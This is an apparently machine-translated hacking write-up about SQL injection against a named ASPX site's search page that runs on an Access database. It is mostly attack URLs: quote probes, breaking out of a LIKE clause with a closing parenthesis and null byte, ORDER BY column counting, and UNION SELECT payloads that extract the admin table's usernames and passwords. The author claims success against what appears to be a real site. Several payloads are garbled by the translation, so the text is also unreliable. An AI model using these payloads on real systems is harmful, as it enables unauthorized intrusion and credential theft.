A little different access Injection

Unlike normal access injection
By ay shadow

An injection point was thrown by a dead hacker, who said it could not be injected. Then I looked at it and found that the injection was indeed different from the previous one. I have never encountered such a situation before.
The following describes my injection process. One aspx site:
Http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1
Enter a single quotation mark and an error is returned.

 

Due to inertial thinking, the injection points of the previous aspx station were all MSSQL, and this injection point thought it was MSSQL, so:
Http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1' and
1 = (select name from sysobjects where xtype = char (85) and '%' ='
An error is reported. How can this problem be solved? Change statement Test
Http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1 'and exists (select name from sysobjects where xtype = char (85) and' % '='
 

My grass reminds me that it was Jet. It turned out to be an access database, Falk. I said class ..... After talking to kh, he originally said it was access, but I didn't see it ..... Bytes
After that, I took it for granted. I prepared to capture the packet and ran it in ADV. When I started the packet capture tool, I suddenly thought of the previous single quotation mark error prompt ....
 
 

His prompt is and (atitle like '% 1' %' or acontent like '% 1' %') Here, it does not end with order
Oh, then I decisively gave up using the ADV injection helper, input http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1') % 00, hey, XI. No error is reported. Then it will go smoothly and order by will be used directly.
Http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1') order
00, 7%
It went smoothly here, and finally it was union, and then the problem occurred,
Http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1') % 20 union % 20 s elect % ,,2, 3,4, 5, 6, 7% 20 from % 20 admin % 20% 00

 
I inserted it. What is the problem? Is the field incorrect ?, Re-order by, right, there are seven fields, and then take a closer look, it seems that the data type is different, it is time type data.
Enter
Http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1') % 20 union % 20 s elect % 20 null, null % 20 from % 20 admin % 20% 00
I inserted it, but it still didn't work. It's strange. Why isn't it? Obviously it's all null, and Baidu goes down, relying on it. It turns out to be
There is no null data type in access...
Continue Baidu... Set "string was not ....." This text is input directly to Baidu to search for the final eye
Http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1') % 20 union % 20 s elect % 201, name, pwd, 6, '2014/1/0% 20PM '% 20 from % 20 admin % 5/28 00
The administrator password is queried successfully.
 

 

Then I read the access data type and found that it can be used in a simpler way.
Http://www.bkjia.com/searchResult. aspx? PaperName = & bdate = & edate = & news = 1') % 20 union % 20 s elect % 201, name, pwd, 6, date () % 20 from % 20 admin % 20% 00
Simpler